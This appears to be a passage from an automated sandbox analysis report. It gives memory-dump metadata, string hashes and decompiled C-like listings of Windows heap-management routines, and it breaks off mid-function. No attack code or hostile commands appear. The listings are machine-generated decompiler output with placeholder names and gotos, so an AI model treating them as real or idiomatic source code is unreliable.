                    0x0109473c
                    0x0109474b
                    0x01094751
                    0x01094751
                    0x00000000
                    0x0109473c
                    0x010948f4
                    0x010948f4
                    0x00000000
                    0x010948f4

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                    • API String ID: 0-1357697941
                    • Opcode ID: 63246a0713b7f9e831778e5f4fbc1e2e1c535edb081d630cfc8b457254c3bbcc
                    • Instruction ID: 2cfabf0b7679b23bd9ad5ad3b5b8e9c3cb7836f94db32008e394a8ae1fdd3c4a
                    • Opcode Fuzzy Hash: 63246a0713b7f9e831778e5f4fbc1e2e1c535edb081d630cfc8b457254c3bbcc
                    • Instruction Fuzzy Hash: 7DF11231600646DFDF21CFA8C560BAABBF5FF09304F088099E186DB691D738E946DB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E00FFA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                    				char _v8;
                    				signed short _v12;
                    				signed short _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed short _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				unsigned int _v52;
                    				signed int _v56;
                    				void* _v60;
                    				intOrPtr _v64;
                    				void* _v72;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				unsigned int _t246;
                    				signed char _t247;
                    				signed short _t249;
                    				unsigned int _t256;
                    				signed int _t262;
                    				signed int _t265;
                    				signed int _t266;
                    				signed int _t267;
                    				intOrPtr _t270;
                    				signed int _t280;
                    				signed int _t286;
                    				signed int _t289;
                    				intOrPtr _t290;
                    				signed int _t291;
                    				signed int _t317;
                    				signed short _t320;
                    				intOrPtr _t327;
                    				signed int _t339;
                    				signed int _t344;
                    				signed int _t347;
                    				intOrPtr _t348;
                    				signed int _t350;
                    				signed int _t352;
                    				signed int _t353;
                    				signed int _t356;
                    				intOrPtr _t357;
                    				intOrPtr _t366;
                    				signed int _t367;
                    				signed int _t370;
                    				intOrPtr _t371;
                    				signed int _t372;
                    				signed int _t394;
                    				signed short _t402;
                    				intOrPtr _t404;
                    				intOrPtr _t415;
                    				signed int _t430;
                    				signed int _t433;
                    				signed int _t437;
                    				signed int _t445;
                    				signed short _t446;
                    				signed short _t449;
                    				signed short _t452;
                    				signed int _t455;
                    				signed int _t460;
                    				signed short* _t468;
                    				signed int _t480;
                    				signed int _t481;
                    				signed int _t483;
                    				intOrPtr _t484;
                    				signed int _t491;
                    				unsigned int _t506;
                    				unsigned int _t508;
                    				signed int _t513;
                    				signed int _t514;
                    				signed int _t521;
                    				signed short* _t533;
                    				signed int _t541;
                    				signed int _t543;
                    				signed int _t546;
                    				unsigned int _t551;
                    				signed int _t553;
                    
                    				_t450 = __ecx;
                    				_t553 = __ecx;
                    				_t539 = __edx;
                    				_v28 = 0;
                    				_v40 = 0;
                    				if(( *(__ecx + 0xcc) ^  *0x10c8a68) != 0) {
                    					_push(_a4);
                    					_t513 = __edx;
                    					L11:
                    					_t246 = E00FFA830(_t450, _t513);
                    					L7:
                    					return _t246;
                    				}
                    				if(_a8 != 0) {
                    					__eflags =  *(__edx + 2) & 0x00000008;
                    					if(( *(__edx + 2) & 0x00000008) != 0) {
                    						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                    						_t430 = E00FFDF24(__edx,  &_v12,  &_v16);
                    						__eflags = _t430;
                    						if(_t430 != 0) {
                    							_t157 = _t553 + 0x234;
                    							 *_t157 =  *(_t553 + 0x234) - _v16;
                    							__eflags =  *_t157;
                    						}
                    					}
                    					_t445 = _a4;
                    					_t514 = _t539;
                    					_v48 = _t539;
                    					L14:
                    					_t247 =  *((intOrPtr*)(_t539 + 6));
                    					__eflags = _t247;
                    					if(_t247 == 0) {
                    						_t541 = _t553;
                    					} else {
                    						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                    						__eflags = _t541;
                    					}
                    					_t249 = 7 + _t445 * 8 + _t514;
                    					_v12 = _t249;
                    					__eflags =  *_t249 - 3;
                    					if( *_t249 == 3) {
                    						_v16 = _t514 + _t445 * 8 + 8;
                    						E00FD9373(_t553, _t514 + _t445 * 8 + 8);
                    						_t452 = _v16;
                    						_v28 =  *(_t452 + 0x10);
                    						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                    						_v36 =  *(_t452 + 0x14);
                    						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                    						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                    						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                    						_t256 =  *(_t452 + 0x14);
                    						__eflags = _t256 - 0x7f000;
                    						if(_t256 >= 0x7f000) {
                    							_t142 = _t553 + 0x1ec;
                    							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                    							__eflags =  *_t142;
                    							_t256 =  *(_t452 + 0x14);
                    						}
                    						_t513 = _v48;
                    						_t445 = _t445 + (_t256 >> 3) + 0x20;
                    						_a4 = _t445;
                    						_v40 = 1;
                    					} else {
                    						_t27 =  &_v36;
                    						 *_t27 = _v36 & 0x00000000;
                    						__eflags =  *_t27;
                    					}
                    					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                    					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                    						_v44 = _t513;
                    						_t262 = E00FDA9EF(_t541, _t513);
                    						__eflags = _a8;
                    						_v32 = _t262;
                    						if(_a8 != 0) {
                    							__eflags = _t262;
                    							if(_t262 == 0) {
                    								goto L19;
                    							}
                    						}
                    						__eflags =  *0x10c8748 - 1;
                    						if( *0x10c8748 >= 1) {
                    							__eflags = _t262;
                    							if(_t262 == 0) {
                    								_t415 =  *[fs:0x30];
                    								__eflags =  *(_t415 + 0xc);
                    								if( *(_t415 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E00FDB150();
                    								} else {
                    									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push("(UCRBlock != NULL)");
                    								E00FDB150();
                    								__eflags =  *0x10c7bc8;
                    								if( *0x10c7bc8 == 0) {
                    									__eflags = 1;
                    									E01092073(_t445, 1, _t541, 1);
                    								}
                    								_t513 = _v48;
                    								_t445 = _a4;
                    							}
                    						}
                    						_t350 = _v40;
                    						_t480 = _t445 << 3;
                    						_v20 = _t480;
                    						_t481 = _t480 + _t513;
                    						_v24 = _t481;
                    						__eflags = _t350;
                    						if(_t350 == 0) {
                    							_t481 = _t481 + 0xfffffff0;
                    							__eflags = _t481;
                    						}
                    						_t483 = (_t481 & 0xfffff000) - _v44;
                    						__eflags = _t483;
                    						_v52 = _t483;
                    						if(_t483 == 0) {
                    							__eflags =  *0x10c8748 - 1;
                    							if( *0x10c8748 < 1) {
                    								goto L9;
                    							}
                    							__eflags = _t350;
                    							goto L146;
                    						} else {
                    							_t352 = E0100174B( &_v44,  &_v52, 0x4000);
                    							__eflags = _t352;
                    							if(_t352 < 0) {
                    								goto L94;
                    							}
                    							_t353 = E00FF7D50();
                    							_t447 = 0x7ffe0380;
                    							__eflags = _t353;
                    							if(_t353 != 0) {
                    								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    							} else {
                    								_t356 = 0x7ffe0380;
                    							}
                    							__eflags =  *_t356;
                    							if( *_t356 != 0) {
                    								_t357 =  *[fs:0x30];
                    								__eflags =  *(_t357 + 0x240) & 0x00000001;
                    								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                    									E010914FB(_t447, _t553, _v44, _v52, 5);
                    								}
                    							}
                    							_t358 = _v32;
                    							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                    							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                    							__eflags = _t484 - 0x7f000;
                    							if(_t484 >= 0x7f000) {
                    								_t90 = _t553 + 0x1ec;
                    								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                    								__eflags =  *_t90;
                    							}
                    							E00FD9373(_t553, _t358);
                    							_t486 = _v32;
                    							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                    							E00FD9819(_t486);
                    							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                    							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                    							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                    							__eflags = _t366 - 0x7f000;
                    							if(_t366 >= 0x7f000) {
                    								_t104 = _t553 + 0x1ec;
                    								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                    								__eflags =  *_t104;
                    							}
                    							__eflags = _v40;
                    							if(_v40 == 0) {
                    								_t533 = _v52 + _v44;
                    								_v32 = _t533;
                    								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                    								__eflags = _v24 - _v52 + _v44;
                    								if(_v24 == _v52 + _v44) {
                    									__eflags =  *(_t553 + 0x4c);
                    									if( *(_t553 + 0x4c) != 0) {
                    										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                    										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                    									}
                    								} else {
                    									_t449 = 0;
                    									_t533[3] = 0;
                    									_t533[1] = 0;
                    									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                    									_t491 = _t394;
                    									 *_t533 = _t394;
                    									__eflags =  *0x10c8748 - 1; // 0x0
                    									if(__eflags >= 0) {
                    										__eflags = _t491 - 1;
                    										if(_t491 <= 1) {
                    											_t404 =  *[fs:0x30];
                    											__eflags =  *(_t404 + 0xc);
                    											if( *(_t404 + 0xc) == 0) {
                    												_push("HEAP: ");
                    												E00FDB150();
                    											} else {
                    												E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    											}
                    											_push("((LONG)FreeEntry->Size > 1)");
                    											E00FDB150();
                    											_pop(_t491);
                    											__eflags =  *0x10c7bc8 - _t449; // 0x0
                    											if(__eflags == 0) {
                    												__eflags = 0;
                    												_t491 = 1;
                    												E01092073(_t449, 1, _t541, 0);
                    											}
                    											_t533 = _v32;
                    										}
                    									}
                    									_t533[1] = _t449;
                    									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                    									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                    										_t402 = (_t533 - _t541 >> 0x10) + 1;
                    										_v16 = _t402;
                    										__eflags = _t402 - 0xfe;
                    										if(_t402 >= 0xfe) {
                    											_push(_t491);
                    											_push(_t449);
                    											E0109A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                    											_t533 = _v48;
                    											_t402 = _v32;
                    										}
                    										_t449 = _t402;
                    									}
                    									_t533[3] = _t449;
                    									E00FFA830(_t553, _t533,  *_t533 & 0x0000ffff);
                    									_t447 = 0x7ffe0380;
                    								}
                    							}
                    							_t367 = E00FF7D50();
                    							__eflags = _t367;
                    							if(_t367 != 0) {
                    								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    							} else {
                    								_t370 = _t447;
                    							}
                    							__eflags =  *_t370;
                    							if( *_t370 != 0) {
                    								_t371 =  *[fs:0x30];
                    								__eflags =  *(_t371 + 0x240) & 1;
                    								if(( *(_t371 + 0x240) & 1) != 0) {
                    									__eflags = E00FF7D50();
                    									if(__eflags != 0) {
                    										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    									}
                    									E01091411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                    								}
                    							}
                    							_t372 = E00FF7D50();
                    							_t546 = 0x7ffe038a;
                    							_t446 = 0x230;
                    							__eflags = _t372;
                    							if(_t372 != 0) {
                    								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                    							} else {
                    								_t246 = 0x7ffe038a;
                    							}
                    							__eflags =  *_t246;
                    							if( *_t246 == 0) {
                    								goto L7;
                    							} else {
                    								__eflags = E00FF7D50();
                    								if(__eflags != 0) {
                    									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                    									__eflags = _t546;
                    								}
                    								_push( *_t546 & 0x000000ff);
                    								_push(_v36);
                    								_push(_v40);
                    								goto L120;
                    							}
                    						}
                    					} else {
                    						L19:
                    						_t31 = _t513 + 0x101f; // 0x101f
                    						_t455 = _t31 & 0xfffff000;
                    						_t32 = _t513 + 0x28; // 0x28
                    						_v44 = _t455;
                    						__eflags = _t455 - _t32;
                    						if(_t455 == _t32) {
                    							_t455 = _t455 + 0x1000;
                    							_v44 = _t455;
                    						}
                    						_t265 = _t445 << 3;
                    						_v24 = _t265;
                    						_t266 = _t265 + _t513;
                    						__eflags = _v40;
                    						_v20 = _t266;
                    						if(_v40 == 0) {
                    							_t266 = _t266 + 0xfffffff0;
                    							__eflags = _t266;
                    						}
                    						_t267 = _t266 & 0xfffff000;
                    						_v52 = _t267;
                    						__eflags = _t267 - _t455;
                    						if(_t267 < _t455) {
                    							__eflags =  *0x10c8748 - 1; // 0x0
                    							if(__eflags < 0) {
                    								L9:
                    								_t450 = _t553;
                    								L10:
                    								_push(_t445);
                    								goto L11;
                    							}
                    							__eflags = _v40;
                    							L146:
                    							if(__eflags == 0) {
                    								goto L9;
                    							}
                    							_t270 =  *[fs:0x30];
                    							__eflags =  *(_t270 + 0xc);
                    							if( *(_t270 + 0xc) == 0) {
                    								_push("HEAP: ");
                    								E00FDB150();
                    							} else {
                    								E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    							}
                    							_push("(!TrailingUCR)");
                    							E00FDB150();
                    							__eflags =  *0x10c7bc8;
                    							if( *0x10c7bc8 == 0) {
                    								__eflags = 0;
                    								E01092073(_t445, 1, _t541, 0);
                    							}
                    							L152:
                    							_t445 = _a4;
                    							L153:
                    							_t513 = _v48;
                    							goto L9;
                    						}
                    						_v32 = _t267;
                    						_t280 = _t267 - _t455;
                    						_v32 = _v32 - _t455;
                    						__eflags = _a8;
                    						_t460 = _v32;
                    						_v52 = _t460;
                    						if(_a8 != 0) {
                    							L27:
                    							__eflags = _t280;
                    							if(_t280 == 0) {
                    								L33:
                    								_t446 = 0;
                    								__eflags = _v40;
                    								if(_v40 == 0) {
                    									_t468 = _v44 + _v52;
                    									_v36 = _t468;
                    									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                    									__eflags = _v20 - _v52 + _v44;
                    									if(_v20 == _v52 + _v44) {
                    										__eflags =  *(_t553 + 0x4c);
                    										if( *(_t553 + 0x4c) != 0) {
                    											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                    											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                    										}
                    									} else {
                    										_t468[3] = 0;
                    										_t468[1] = 0;
                    										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                    										_t521 = _t317;
                    										 *_t468 = _t317;
                    										__eflags =  *0x10c8748 - 1; // 0x0
                    										if(__eflags >= 0) {
                    											__eflags = _t521 - 1;
                    											if(_t521 <= 1) {
                    												_t327 =  *[fs:0x30];
                    												__eflags =  *(_t327 + 0xc);
                    												if( *(_t327 + 0xc) == 0) {
                    													_push("HEAP: ");
                    													E00FDB150();
                    												} else {
                    													E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    												}
                    												_push("(LONG)FreeEntry->Size > 1");
                    												E00FDB150();
                    												__eflags =  *0x10c7bc8 - _t446; // 0x0
                    												if(__eflags == 0) {
                    													__eflags = 1;
                    													E01092073(_t446, 1, _t541, 1);
                    												}
                    												_t468 = _v36;
                    											}
                    										}
                    										_t468[1] = _t446;
                    										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                    										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                    										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                    											_t320 = _t446;
                    										} else {
                    											_t320 = (_t468 - _t541 >> 0x10) + 1;
                    											_v12 = _t320;
                    											__eflags = _t320 - 0xfe;
                    											if(_t320 >= 0xfe) {
                    												_push(_t468);
                    												_push(_t446);
                    												E0109A80D(_t522, 3, _t468, _t541);
                    												_t468 = _v52;
                    												_t320 = _v28;
                    											}
                    										}
                    										_t468[3] = _t320;
                    										E00FFA830(_t553, _t468,  *_t468 & 0x0000ffff);
                    									}
                    								}
                    								E00FFB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                    								E00FFA830(_t553, _v64, _v24);
                    								_t286 = E00FF7D50();
                    								_t542 = 0x7ffe0380;
                    								__eflags = _t286;
                    								if(_t286 != 0) {
                    									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    								} else {
                    									_t289 = 0x7ffe0380;
                    								}
                    								__eflags =  *_t289;
                    								if( *_t289 != 0) {
                    									_t290 =  *[fs:0x30];
                    									__eflags =  *(_t290 + 0x240) & 1;
                    									if(( *(_t290 + 0x240) & 1) != 0) {
                    										__eflags = E00FF7D50();
                    										if(__eflags != 0) {
                    											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    										}
                    										E01091411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                    									}
                    								}
                    								_t291 = E00FF7D50();
                    								_t543 = 0x7ffe038a;
                    								__eflags = _t291;
                    								if(_t291 != 0) {
                    									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                    								} else {
                    									_t246 = 0x7ffe038a;
                    								}
                    								__eflags =  *_t246;
                    								if( *_t246 != 0) {
                    									__eflags = E00FF7D50();
                    									if(__eflags != 0) {
                    										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                    										__eflags = _t543;
                    									}
                    									_push( *_t543 & 0x000000ff);
                    									_push(_t446);
                    									_push(_t446);
                    									L120:
                    									_push( *(_t553 + 0x74) << 3);
                    									_push(_v52);
                    									_t246 = E01091411(_t446, _t553, _v44, __eflags);
                    								}
                    								goto L7;
                    							}
                    							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                    							_t339 = E0100174B( &_v44,  &_v52, 0x4000);
                    							__eflags = _t339;
                    							if(_t339 < 0) {
                    								L94:
                    								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                    								__eflags = _v40;
                    								if(_v40 == 0) {
                    									goto L153;
                    								}
                    								E00FFB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                    								goto L152;
                    							}
                    							_t344 = E00FF7D50();
                    							__eflags = _t344;
                    							if(_t344 != 0) {
                    								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    							} else {
                    								_t347 = 0x7ffe0380;
                    							}
                    							__eflags =  *_t347;
                    							if( *_t347 != 0) {
                    								_t348 =  *[fs:0x30];
                    								__eflags =  *(_t348 + 0x240) & 1;
                    								if(( *(_t348 + 0x240) & 1) != 0) {
                    									E010914FB(_t445, _t553, _v44, _v52, 6);
                    								}
                    							}
                    							_t513 = _v48;
                    							goto L33;
                    						}
                    						__eflags =  *_v12 - 3;
                    						_t513 = _v48;
                    						if( *_v12 == 3) {
                    							goto L27;
                    						}
                    						__eflags = _t460;
                    						if(_t460 == 0) {
                    							goto L9;
                    						}
                    						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                    						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                    							goto L9;
                    						}
                    						goto L27;
                    					}
                    				}
                    				_t445 = _a4;
                    				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                    					_t513 = __edx;
                    					goto L10;
                    				}
                    				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                    				_v20 = _t433;
                    				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                    					_t513 = _t539;
                    					goto L9;
                    				} else {
                    					_t437 = E00FF99BF(__ecx, __edx,  &_a4, 0);
                    					_t445 = _a4;
                    					_t514 = _t437;
                    					_v56 = _t514;
                    					if(_t445 - 0x201 > 0xfbff) {
                    						goto L14;
                    					} else {
                    						E00FFA830(__ecx, _t514, _t445);
                    						_t506 =  *(_t553 + 0x238);
                    						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                    						_t246 = _t506 >> 4;
                    						if(_t551 < _t506 - _t246) {
                    							_t508 =  *(_t553 + 0x23c);
                    							_t246 = _t508 >> 2;
                    							__eflags = _t551 - _t508 - _t246;
                    							if(_t551 > _t508 - _t246) {
                    								_t246 = E0100ABD8(_t553);
                    								 *(_t553 + 0x23c) = _t551;
                    								 *(_t553 + 0x238) = _t551;
                    							}
                    						}
                    						goto L7;
                    					}
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-523794902
                    • Opcode ID: 391d85ba1b216c7df847f74bbb8627f5151234639e9e5816979afc9d2be50838
                    • Instruction ID: 574466d446c766c088224f41f58dea228aa5916b3ec43bd191de2eed221a2fe8
                    • Opcode Fuzzy Hash: 391d85ba1b216c7df847f74bbb8627f5151234639e9e5816979afc9d2be50838
                    • Instruction Fuzzy Hash: 7142E0B16083459FC715DF28C884B3ABBE5BF88704F18496DF5898B362D738E981DB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E01092D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t83;
                    				signed char _t89;
                    				intOrPtr _t90;
                    				signed char _t101;
                    				signed int _t102;
                    				intOrPtr _t104;
                    				signed int _t105;
                    				signed int _t106;
                    				intOrPtr _t108;
                    				intOrPtr _t112;
                    				short* _t130;
                    				short _t131;
                    				signed int _t148;
                    				intOrPtr _t149;
                    				signed int* _t154;
                    				short* _t165;
                    				signed int _t171;
                    				void* _t182;
                    
                    				_push(0x44);
                    				_push(0x10b0e80);
                    				E0102D0E8(__ebx, __edi, __esi);
                    				_t177 = __edx;
                    				_t181 = __ecx;
                    				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                    				 *((char*)(_t182 - 0x1d)) = 0;
                    				 *(_t182 - 0x24) = 0;
                    				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                    					 *((intOrPtr*)(_t182 - 4)) = 0;
                    					 *((intOrPtr*)(_t182 - 4)) = 1;
                    					_t83 = E00FD40E1("RtlAllocateHeap");
                    					__eflags = _t83;
                    					if(_t83 == 0) {
                    						L48:
                    						 *(_t182 - 0x24) = 0;
                    						L49:
                    						 *((intOrPtr*)(_t182 - 4)) = 0;
                    						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                    						E010930C4();
                    						goto L50;
                    					}
                    					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                    					 *(_t182 - 0x28) = _t89;
                    					 *(_t182 - 0x3c) = _t89;
                    					_t177 =  *(_t182 + 8);
                    					__eflags = _t177;
                    					if(_t177 == 0) {
                    						_t171 = 1;
                    						__eflags = 1;
                    					} else {
                    						_t171 = _t177;
                    					}
                    					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                    					__eflags = _t148 - 0x10;
                    					if(_t148 < 0x10) {
                    						_t148 = 0x10;
                    					}
                    					_t149 = _t148 + 8;
                    					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                    					__eflags = _t149 - _t177;
                    					if(_t149 < _t177) {
                    						L44:
                    						_t90 =  *[fs:0x30];
                    						__eflags =  *(_t90 + 0xc);
                    						if( *(_t90 + 0xc) == 0) {
                    							_push("HEAP: ");
                    							E00FDB150();
                    						} else {
                    							E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    						}
                    						_push( *((intOrPtr*)(_t181 + 0x78)));
                    						E00FDB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                    						goto L48;
                    					} else {
                    						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                    						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                    							goto L44;
                    						}
                    						__eflags = _t89 & 0x00000001;
                    						if((_t89 & 0x00000001) != 0) {
                    							_t178 =  *(_t182 - 0x28);
                    						} else {
                    							E00FEEEF0( *((intOrPtr*)(_t181 + 0xc8)));
                    							 *((char*)(_t182 - 0x1d)) = 1;
                    							_t178 =  *(_t182 - 0x28) | 0x00000001;
                    							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                    						}
                    						E01094496(_t181, 0);
                    						_t177 = L00FF4620(_t181, _t181, _t178,  *(_t182 + 8));
                    						 *(_t182 - 0x24) = _t177;
                    						_t173 = 1;
                    						E010949A4(_t181);
                    						__eflags = _t177;
                    						if(_t177 == 0) {
                    							goto L49;
                    						} else {
                    							_t177 = _t177 + 0xfffffff8;
                    							__eflags =  *((char*)(_t177 + 7)) - 5;
                    							if( *((char*)(_t177 + 7)) == 5) {
                    								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                    								__eflags = _t177;
                    							}
                    							_t154 = _t177;
                    							 *(_t182 - 0x40) = _t177;
                    							__eflags =  *(_t181 + 0x4c);
                    							if( *(_t181 + 0x4c) != 0) {
                    								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                    								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                    								if(__eflags != 0) {
                    									_push(_t154);
                    									_t173 = _t177;
                    									E0108FA2B(0, _t181, _t177, _t177, _t181, __eflags);
                    								}
                    							}
                    							__eflags =  *(_t177 + 2) & 0x00000002;
                    							if(( *(_t177 + 2) & 0x00000002) == 0) {
                    								_t101 =  *(_t177 + 3);
                    								 *(_t182 - 0x29) = _t101;
                    								_t102 = _t101 & 0x000000ff;
                    							} else {
                    								_t130 = E00FD1F5B(_t177);
                    								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                    								__eflags =  *(_t181 + 0x40) & 0x08000000;
                    								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                    									 *_t130 = 0;
                    								} else {
                    									_t131 = E010016C7(1, _t173);
                    									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                    									 *_t165 = _t131;
                    									_t130 = _t165;
                    								}
                    								_t102 =  *(_t130 + 2) & 0x0000ffff;
                    							}
                    							 *(_t182 - 0x34) = _t102;
                    							 *(_t182 - 0x28) = _t102;
                    							__eflags =  *(_t181 + 0x4c);
                    							if( *(_t181 + 0x4c) != 0) {
                    								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                    								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                    								__eflags =  *_t177;
                    							}
                    							__eflags =  *(_t181 + 0x40) & 0x20000000;
                    							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                    								__eflags = 0;
                    								E01094496(_t181, 0);
                    							}
                    							__eflags =  *(_t182 - 0x24) -  *0x10c6360; // 0x0
                    							_t104 =  *[fs:0x30];
                    							if(__eflags != 0) {
                    								_t105 =  *(_t104 + 0x68);
                    								 *(_t182 - 0x4c) = _t105;
                    								__eflags = _t105 & 0x00000800;
                    								if((_t105 & 0x00000800) == 0) {
                    									goto L49;
                    								}
                    								_t106 =  *(_t182 - 0x34);
                    								__eflags = _t106;
                    								if(_t106 == 0) {
                    									goto L49;
                    								}
                    								__eflags = _t106 -  *0x10c6364; // 0x0
                    								if(__eflags != 0) {
                    									goto L49;
                    								}
                    								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x10c6366; // 0x0
                    								if(__eflags != 0) {
                    									goto L49;
                    								}
                    								_t108 =  *[fs:0x30];
                    								__eflags =  *(_t108 + 0xc);
